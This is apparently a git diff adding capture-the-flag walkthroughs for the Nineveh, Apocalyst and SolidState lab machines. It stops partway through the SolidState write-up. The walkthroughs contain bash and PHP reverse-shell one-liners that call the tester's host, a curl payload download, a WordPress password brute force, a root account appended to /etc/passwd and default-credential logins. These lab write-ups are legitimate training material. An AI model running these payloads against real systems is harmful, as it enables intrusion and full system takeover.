+ **ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb**
+
+
+
+so we save them both locally :
+
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → nano pkey
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → nano pubkey
+
+
+
+before we use the ssh key though, we need to somehow open the port 22, so we check /etc/knockd.conf to see what we should do :
+
+
+ $ cat /etc/knockd.conf
+ [options]
+ logfile = /var/log/knockd.log
+ interface = ens33
+
+ [openSSH]
+ sequence = 571, 290, 911
+ seq_timeout = 5
+ start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
+ tcpflags = syn
+
+ [closeSSH]
+ sequence = 911,290,571
+ seq_timeout = 5
+ start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
+ tcpflags = syn
+
+
+Now we need to basically scan each of the mentionned ports (911,290,571) to open the port 22 (ssh), so we run the according nmap scan to scan the ports we need in the CORRECT sequence :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → for x in 571 290 911 22; do nmap -Pn --max-retries 0 -p $x 10.10.10.43; done
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 14:41 GMT
+ Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
+ Nmap scan report for nineveh.htb (10.10.10.43)
+ Host is up.
+
+ PORT STATE SERVICE
+ 571/tcp filtered umeter
+
+ Nmap done: 1 IP address (1 host up) scanned in 1.08 seconds
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 14:41 GMT
+ Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
+ Nmap scan report for nineveh.htb (10.10.10.43)
+ Host is up.
+
+ PORT STATE SERVICE
+ 290/tcp filtered unknown
+
+ Nmap done: 1 IP address (1 host up) scanned in 1.07 seconds
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 14:41 GMT
+ Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
+ Nmap scan report for nineveh.htb (10.10.10.43)
+ Host is up.
+
+ PORT STATE SERVICE
+ 911/tcp filtered xact-backup
+
+ Nmap done: 1 IP address (1 host up) scanned in 1.07 seconds
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 14:41 GMT
+ Nmap scan report for nineveh.htb (10.10.10.43)
+ Host is up (0.100s latency).
+
+ PORT STATE SERVICE
+ 22/tcp open ssh
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
+
+
+and port 22 is opened ! now let's connect with our ssh key as the user amrois:
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → chmod 600 pkey
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → ssh -i pkey amrois@10.10.10.43
+ The authenticity of host '10.10.10.43 (10.10.10.43)' can't be established.
+ ECDSA key fingerprint is SHA256:aWXPsULnr55BcRUl/zX0n4gfJy5fg29KkuvnADFyMvk.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.43' (ECDSA) to the list of known hosts.
+ Ubuntu 16.04.2 LTS
+ Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 133 packages can be updated.
+ 66 updates are security updates.
+
+
+ You have mail.
+ Last login: Mon Jul 3 00:19:59 2017 from 192.168.0.14
+ amrois@nineveh:~$ cat /home/amrois/user.txt
+ 82XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we finally have the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc we need to take a look at the /usr/bin/ directory containing the chkrootkit executable :
+
+
+ amrois@nineveh:/usr/bin$ cd ~
+ amrois@nineveh:~$ ls
+ user.txt
+ amrois@nineveh:/tmp$ which curl
+ /usr/bin/curl
+ amrois@nineveh:~$ ls -lash /usr/bin/ | grep chkroot
+ 76K -rwx--x--x 1 root root 75K Jul 2 2017 chkrootkit
+ amrois@nineveh:~$ file /usr/bin/chkrootkit
+ /usr/bin/chkrootkit: executable, regular file, no read permission
+
+
+and we see that it's owned by root ! now running a quick searchsploitcommand we see that we can do the following to gain root access thanks to this chkrootkit binary :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → searchsploit chkrootkit
+ ----------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ----------------------------------------------------------------------------- ----------------------------------------
+ Chkrootkit - Local Privilege Escalation (Metasploit) | exploits/linux/local/38775.rb
+ Chkrootkit 0.49 - Local Privilege Escalation | exploits/linux/local/33899.txt
+ ----------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → locate 33899.txt
+ /usr/share/exploitdb/exploits/linux/local/33899.txt
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → cat /usr/share/exploitdb/exploits/linux/local/33899.txt
+
+
+
+ Steps to reproduce:
+
+ - Put an executable file named 'update' with non-root owner in /tmp (not
+ mounted noexec, obviously)
+ - Run chkrootkit (as uid 0)
+
+ Result: The file /tmp/update will be executed as root, thus effectively
+ rooting your box, if malicious content is placed inside the file.
+
+ If an attacker knows you are periodically running chkrootkit (like in
+ cron.daily) and has write access to /tmp (not mounted noexec), he may
+ easily take advantage of this.
+
+
+
+so to replicate the aforementionned steps, we'll put into our update file placed in /tmp the reverse shell one liner we used twice already : uploading it thanks to the curl command which is there on the machine.
+
+
+ #!/bin/bash
+ bash -i >& /dev/tcp/10.10.14.20/9003 0>&1
+
+
+` _Terminal 1 :_
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → nano update
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → python -m SimpleHTTPServer 7070
+ Serving HTTP on 0.0.0.0 port 7070 ...
+
+
+` _Terminal 2 :_
+
+
+ amrois@nineveh:/tmp$ curl -sk http://10.10.14.20:7070/update > update
+ amrois@nineveh:/tmp$ ls -lash | grep update
+ 4.0K -rw-rw-r-- 1 amrois amrois 71 Feb 25 08:59 update
+ amrois@nineveh:/tmp$ chmod +x update
+
+ amrois@nineveh:~$ cat /tmp/update
+ #!/bin/bash
+ bash -i >& /dev/tcp/10.10.14.20/9003 0>&1
+
+
+` _Terminal 3 :_
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → nc -lvnp 9003
+ listening on [any] 9003 ...
+ connect to [10.10.14.20] from (UNKNOWN) [10.10.10.43] 41598
+ bash: cannot set terminal process group (19824): Inappropriate ioctl for device
+ bash: no job control in this shell
+ root@nineveh:~# cat /root/root.txt
+ cat /root/root.txt
+ 8aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And after waiting a minute for chkrootkit to execute our infected /tmp/update file, we get a reverse shell as root ! and we've been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/11.md b/Medium/11.md
new file mode 100644
index 0000000..1a5ed32
--- /dev/null
+++ b/Medium/11.md
@@ -0,0 +1,381 @@
+# Apocalyst Writeup
+
+
+
+## Introduction :
+
+Apocalyst is a medium linux box released back in August 2017
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~]
+ → nmap -F 10.10.10.46
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 12:27 GMT
+ Nmap scan report for 10.10.10.46
+ Host is up (0.11s latency).
+ Not shown: 98 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 1.73 seconds
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~]
+ → nmap -sCV -p80,22 10.10.10.46
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 12:28 GMT
+ Nmap scan report for 10.10.10.46
+ Host is up (0.095s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 fd:ab:0f:c9:22:d5:f4:8f:7a:0a:29:11:b4:04:da:c9 (RSA)
+ | 256 76:92:39:0a:57:bd:f0:03:26:78:c7:db:1a:66:a5:bc (ECDSA)
+ |_ 256 12:12:cf:f1:7f:be:43:1f:d5:e6:6d:90:84:25:c8:bd (ED25519)
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-generator: WordPress 4.8
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Apocalypse Preparation Blog
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 12.64 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up the 80th port running http so let's investigate it :
+
+
+
+
+ λ root [ 10.10.14.11/23 ] [/home/nihilist]
+ → echo '10.10.10.46 apocalyst.htb' >> /etc/hosts
+
+
+` 
+
+Once we add the apocalyst.htb domain name to our /etc/hosts file, we fix the formatting issue of what seems to be a wordpress website. Now let's run the wpscan command to see if we can find anything obvious :
+
+
+ λ root [ 10.10.14.11/23 ] [/home/nihilist]
+ → wpscan --url http://10.10.10.46 -e
+ _______________________________________________________________
+ __ _______ _____
+ \ \ / / __ \ / ____|
+ \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
+ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
+ \ /\ / | | ____) | (__| (_| | | | |
+ \/ \/ |_| |_____/ \___|\__,_|_| |_|
+
+ WordPress Security Scanner by the WPScan Team
+ Version 3.7.8
+ Sponsored by Automattic - https://automattic.com/
+ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
+ _______________________________________________________________
+
+ [+] URL: http://10.10.10.46/
+ [+] Started: Mon Mar 2 14:32:34 2020
+
+ Interesting Finding(s):
+
+ [+] http://10.10.10.46/
+ | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
+ | Found By: Headers (Passive Detection)
+ | Confidence: 100%
+
+ [+] http://10.10.10.46/xmlrpc.php
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 100%
+ | References:
+ | - http://codex.wordpress.org/XML-RPC_Pingback_API
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
+ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
+
+ [i] User(s) Identified:
+
+ [+] falaraki
+ | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
+ | Confirmed By: Login Error Messages (Aggressive Detection)
+
+ [!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
+ [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
+
+ [+] Finished: Mon Mar 2 14:33:48 2020
+ [+] Requests Done: 3064
+ [+] Cached Requests: 43
+ [+] Data Sent: 757.552 KB
+ [+] Data Received: 440.874 KB
+ [+] Memory used: 203.988 MB
+ [+] Elapsed time: 00:01:14
+
+
+
+And we have a username ! falaraki now let's make a directory wordlist using cewl, and then use owasp's dirbuster using the wordlist we created.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
+ → cewl http://10.10.10.46 > directories.txt
+
+
+and now passing the wordlist to dirbuster :
+
+ 
+
+Here we see that there is something odd with the Rightiousness directory, the size of the response doesn't correspond to the others (421 and here 440) So upon further investigation, we see that the webpage in question has just one image in jpg format. Looking at the sourcecode we get hinted towards a "needle" or perhaps in this case, steganography that's why we'll use the steghide command :
+
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
+ → wget http://10.10.10.46/Rightiousness/image.jpg
+ --2020-03-02 14:49:22-- http://10.10.10.46/Rightiousness/image.jpg
+ Connecting to 10.10.10.46:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 215541 (210K) [image/jpeg]
+ Saving to: ‘image.jpg’
+
+ image.jpg 100%[===============================================>] 210.49K 435KB/s in 0.5s
+
+ 2020-03-02 14:49:23 (435 KB/s) - ‘image.jpg’ saved [215541/215541]
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
+ → steghide extract -sf image.jpg
+ Enter passphrase:
+ wrote extracted data to "list.txt".
+
+
+
+And we get a wordlist named "list.txt", let's try to use this wordlist as a password, using wpscan one more time.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
+ → sudo wpscan --url http://apocalyst.htb --usernames falaraki --passwords list.txt
+ [sudo] password for nihilist:
+ _______________________________________________________________
+ __ _______ _____
+ \ \ / / __ \ / ____|
+ \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
+ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
+ \ /\ / | | ____) | (__| (_| | | | |
+ \/ \/ |_| |_____/ \___|\__,_|_| |_|
+
+ WordPress Security Scanner by the WPScan Team
+ Version 3.7.8
+ Sponsored by Automattic - https://automattic.com/
+ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
+ _______________________________________________________________
+
+ [+] URL: http://apocalyst.htb/
+ [+] Started: Mon Mar 2 14:53:34 2020
+
+ Interesting Finding(s):
+
+ [+] Performing password attack on Wp Login against 1 user/s
+ [SUCCESS] - falaraki / Transclisiation
+ Trying falaraki / total Time: 00:00:16 <==========================================> (335 / 335) 100.00% Time: 00:00:16
+
+ [i] Valid Combinations Found:
+ | Username: falaraki, Password: Transclisiation
+
+ [!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
+ [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
+
+ [+] Finished: Mon Mar 2 14:54:01 2020
+ [+] Requests Done: 388
+ [+] Cached Requests: 5
+ [+] Data Sent: 116.313 KB
+ [+] Data Received: 1.533 MB
+ [+] Memory used: 184.266 MB
+ [+] Elapsed time: 00:00:26
+
+
+and we have found credentials ! falaraki:Transclisiation so let's try to login at the corresponding url http://apocalyst.htb/wp-login :
+
+ 
+
+And we are logged in ! now moving over to the appearance page we'll upload our reverse php shell :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
+ → locate nihilist.php
+ /home/nihilist/_HTB/Bastard/nihilist.php
+ /home/nihilist/_HTB/Cronos/nihilist.php
+ /home/nihilist/_HTB/Haircut/nihilist.php
+ /home/nihilist/_HTB/Networked/nihilist.php.gif
+ /home/nihilist/_HTB/October/nihilist.php5
+ /home/nihilist/_HTB/Popcorn/nihilist.php
+ /home/nihilist/_HTB/Popcorn/nihilist.php.gif
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
+ → cp /home/nihilist/_HTB/Cronos/nihilist.php .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
+ → nano nihilist.php
+
+
+
+ <****?php
+ exec("/bin/bash -c 'bash -i > & /dev/tcp/10.10.14.11/9001 0>&1'");
+ ?****>
+
+` 
+
+Once we have updated the 404.php page we just have to browse to it for it to connect back to us:
+
+
+
+And we get a reverse shell as www-data ! let's see if we can print out the user flag :
+
+
+ www-data@apocalyst:/$ id
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+ www-data@apocalyst:/$ cd home
+ cd home
+ www-data@apocalyst:/home$ ls
+ ls
+ falaraki
+ www-data@apocalyst:/home$ cd falaraki
+ cd falaraki
+ www-data@apocalyst:/home/falaraki$ cat user.txt
+ cat user.txt
+ 91XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now before we attempt to privesc let's spawn a tty shell using python3, since python1 isn't there on the machine.
+
+
+ www-data@apocalyst:/home/falaraki$ which python
+ which python
+ www-data@apocalyst:/home/falaraki$ which python3
+ which python3
+ /usr/bin/python3
+ www-data@apocalyst:/home/falaraki$ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ www-data@apocalyst:/home/falaraki$ ls
+ ls
+ user.txt
+
+ www-data@apocalyst:/home/falaraki$ which wget
+ which wget
+ /usr/bin/wget
+
+
+Now that we have wget on the machine, we can enumerate the machine by uploading LinEnum.sh into the /tmp directory.
+
+
+ ww-data@apocalyst:/home/falaraki$ cd /tmp
+ cd /tmp
+ www-data@apocalyst:/tmp$ wget 10.10.14.11:1234/LinEnum.sh
+ wget 10.10.14.11:1234/LinEnum.sh
+ --2020-03-02 15:28:52-- http://10.10.14.11:1234/LinEnum.sh
+ Connecting to 10.10.14.11:1234... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 46631 (46K) [text/x-sh]
+ Saving to: 'LinEnum.sh'
+
+ LinEnum.sh 100%[===================>] 45.54K 225KB/s in 0.2s
+
+ 2020-03-02 15:28:52 (225 KB/s) - 'LinEnum.sh' saved [46631/46631]
+
+ www-data@apocalyst:/tmp$ chmod +x LinEnum.sh
+ chmod +x LinEnum.sh
+ www-data@apocalyst:/tmp$ ./LinEnum.sh
+
+
+Then looking at the results, we see that we can read/write (RW) into sensitive files within /etc most notably passwd, group, noprofile or shadow. so let's use openssl to generate a password (123) :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → openssl passwd -1
+ Password:
+ Verifying - Password:
+ $1$nxydvNly$fw09LyfykjjXEd3RXeRo5/
+
+
+Now with this we can construct a line to add in /etc/passwd :
+
+
+ root2:$1$nxydvNly$fw09LyfykjjXEd3RXeRo5/:0:0:root2:/root:/bin/bash
+
+
+
+ www-data@apocalyst:/etc$ echo 'root2:$1$nxydvNly$fw09LyfykjjXEd3RXeRo5/:0:0:root2:/root:/bin/bash' >> passwd
+
+ www-data@apocalyst:/etc$ cat passwd
+ cat passwd
+ root:x:0:0:root:/root:/bin/bash
+ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+ bin:x:2:2:bin:/bin:/usr/sbin/nologin
+ sys:x:3:3:sys:/dev:/usr/sbin/nologin
+ sync:x:4:65534:sync:/bin:/bin/sync
+ games:x:5:60:games:/usr/games:/usr/sbin/nologin
+ man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+ lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+ mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+ news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+ uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+ proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+ www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+ backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+ list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+ irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+ gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+ nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
+ systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
+ systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
+ systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
+ syslog:x:104:108::/home/syslog:/bin/false
+ _apt:x:105:65534::/nonexistent:/bin/false
+ lxd:x:106:65534::/var/lib/lxd/:/bin/false
+ messagebus:x:107:111::/var/run/dbus:/bin/false
+ uuidd:x:108:112::/run/uuidd:/bin/false
+ dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
+ falaraki:x:1000:1000:Falaraki Rainiti,,,:/home/falaraki:/bin/bash
+ sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
+ mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false
+ nihilist:$1$k48ck7uo$/CibZLSHGr7wiCQJWNQNW./:0:0:nihilist:/root:/bin/bash
+ nihilist:$1$dkV9okB6$oRhhfakYp7/2QRZpsD0570/:0:0:nihilist:/root:/bin/bash
+ root2:$1$nxydvNly$fw09LyfykjjXEd3RXeRo5/:0:0:root2:/root:/bin/bash
+
+
+Now that's done let's su as root2
+
+
+ www-data@apocalyst:/etc$ su root2
+ su root2
+ Password: 123
+
+ root@apocalyst:/etc# id
+ id
+ uid=0(root) gid=0(root) groups=0(root)
+
+
+And that's it ! we have been able to log into the second root user we just created, effectively escalating privileges to the root permissions. now we just have to print our root flag :
+
+
+ root@apocalyst:/etc# cat /root/root.txt
+ cat /root/root.txt
+ 1cXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/12.md b/Medium/12.md
new file mode 100644
index 0000000..f8e8227
--- /dev/null
+++ b/Medium/12.md
@@ -0,0 +1,464 @@
+# SolidState Writeup
+
+
+
+## Introduction :
+
+Solidstate is a medium Linux box released back in September 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -F 10.10.10.51 --top-ports 50000 -vvv
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-03 06:15 GMT
+ Initiating Ping Scan at 06:15
+ Scanning 10.10.10.51 [2 ports]
+ Completed Ping Scan at 06:15, 0.20s elapsed (1 total hosts)
+ Initiating Parallel DNS resolution of 1 host. at 06:15
+ Completed Parallel DNS resolution of 1 host. at 06:15, 0.01s elapsed
+ DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
+ Initiating Connect Scan at 06:15
+ Scanning 10.10.10.51 [8320 ports]
+ Discovered open port 22/tcp on 10.10.10.51
+ Discovered open port 25/tcp on 10.10.10.51
+ Discovered open port 80/tcp on 10.10.10.51
+ Discovered open port 110/tcp on 10.10.10.51
+ Increasing send delay for 10.10.10.51 from 0 to 5 due to max_successful_tryno increase to 4
+ Increasing send delay for 10.10.10.51 from 5 to 10 due to max_successful_tryno increase to 5
+ Discovered open port 119/tcp on 10.10.10.51
+ Connect Scan Timing: About 18.68% done; ETC: 06:18 (0:02:15 remaining)
+ Discovered open port 4555/tcp on 10.10.10.51
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -sCV -p22,25,80,110,119,4555 10.10.10.51
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-03 06:17 GMT
+ Nmap scan report for 10.10.10.51
+ Host is up (0.23s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
+ | 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
+ |_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
+ 25/tcp open smtp JAMES smtpd 2.3.2
+ |_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.11 [10.10.14.11]),
+ 80/tcp open http Apache httpd 2.4.25 ((Debian))
+ |_http-server-header: Apache/2.4.25 (Debian)
+ |_http-title: Home - Solid State Security
+ 110/tcp open pop3 JAMES pop3d 2.3.2
+ 119/tcp open nntp JAMES nntpd (posting ok)
+ 4555/tcp open james-admin JAMES Remote Admin 2.3.2
+ Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 26.99 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80, so let's investigate it :
+
+
+
+Browsing at the bottom we find an username : webadmin
+
+
+
+now let's dirsearch the website to see if we find anything interesting :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → dirsearch -u http://10.10.10.51/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50 -e php,txt,html,js,xml
+ git clone https://github.com/maurosoria/dirsearch.git
+ dirsearch -u -e -t 50 -x 500
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php, txt, html, js, xml | HTTP method: get | Threads: 50 | Wordlist size: 87646
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-03-03_06-21-26.log
+
+ Target: http://10.10.10.51/
+
+ [06:21:27] Starting:
+ [06:21:29] 301 - 311B - /images -> http://10.10.10.51/images/
+ [06:21:29] 200 - 8KB - /
+ [06:21:30] 301 - 311B - /assets -> http://10.10.10.51/assets/
+
+ Task Completed
+
+
+`  
+
+Doesn't seem like there's much on it, so let's investigate the port 4555 :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nc 10.10.10.51 4555
+ JAMES Remote Administration Tool 2.3.2
+ Please enter your login and password
+ Login id:
+ root
+
+ Password:
+ root
+
+ Welcome root. HELP for a list of commands
+ HELP
+
+ Currently implemented commands:
+ help display this help
+ listusers display existing accounts
+ countusers display the number of existing accounts
+ adduser [username] [password] add a new user
+ verify [username] verify if specified user exist
+ deluser [username] delete existing user
+ setpassword [username] [password] sets a user's password
+ setalias [user] [alias] locally forwards all email for 'user' to 'alias'
+ showalias [username] shows a user's current email alias
+ unsetalias [user] unsets an alias for 'user'
+ setforwarding [username] [emailaddress] forwards a user's email to another email address
+ showforwarding [username] shows a user's current email forwarding
+ unsetforwarding [username] removes a forward
+ user [repositoryname] change to another user repository
+ shutdown kills the current JVM (convenient when James is run as a daemon)
+ quit close connection
+
+
+trying out the default credentials (root:root) we log in as the root user now let's see what we have :
+
+
+ Welcome root. HELP for a list of commands
+ listusers
+ Existing accounts 5
+ user: james
+ user: thomas
+ user: john
+ user: mindy
+ user: mailadmin
+
+ setpassword james nihilist
+ Password for james reset
+
+ setpassword thomas nihilist
+ Password for thomas reset
+
+ setpassword john nihilist
+ Password for john reset
+
+ setpassword mindy nihilist
+ Password for mindy reset
+
+ setpassword mailadmin nihilist
+ Password for mailadmin reset
+
+
+We get a bunch of users so let's change their passwords to something easy to remember and investigate the pop3 service running on port 110 :
+
+
+ POP3:
+
+ USER user
+ PASS password
+ STAT
+ LIST
+ RETR nbmessage
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → telnet 10.10.10.51 110
+ Trying 10.10.10.51...
+ Connected to 10.10.10.51.
+ Escape character is '^]'.
+ +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
+ USER james
+ +OK
+ PASS nihilist
+ +OK Welcome james
+ STAT
+ +OK 0 0
+ LIST
+ +OK 0 0
+ .
+ RETR 1
+ -ERR Message (1) does not exist.
+
+
+Using telnet to access the POP3 service, we login as the james user but see that he doesn't have any interesting mail. so let's move on to the 2 interesting ones :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → telnet 10.10.10.51 110
+ Trying 10.10.10.51...
+ Connected to 10.10.10.51.
+ Escape character is '^]'.
+ +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
+ USER mindy
+ +OK
+ PASS nihilist
+ +OK Welcome mindy
+ STAT
+ +OK 2 1945
+ LIST
+ +OK 2 1945
+ 1 1109
+ 2 836
+ .
+ RETR 2
+ +OK Message follows
+ Return-Path: <****mailadmin@localhost>
+ Message-ID: <****16744123.2.1503422270399.JavaMail.root@solidstate>
+ MIME-Version: 1.0
+ Content-Type: text/plain; charset=us-ascii
+ Content-Transfer-Encoding: 7bit
+ Delivered-To: mindy@localhost
+ Received: from 192.168.11.142 ([192.168.11.142])
+ by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
+ for <****mindy@localhost>;
+ Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
+ Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
+ From: mailadmin@localhost
+ Subject: Your Access
+
+ Dear Mindy,
+
+
+ Here are your ssh credentials to access the system. Remember to reset your password after your first login.
+ Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
+
+ username: mindy
+ pass: P@55W0rd1!2@
+
+ Respectfully,
+ James
+
+ .
+
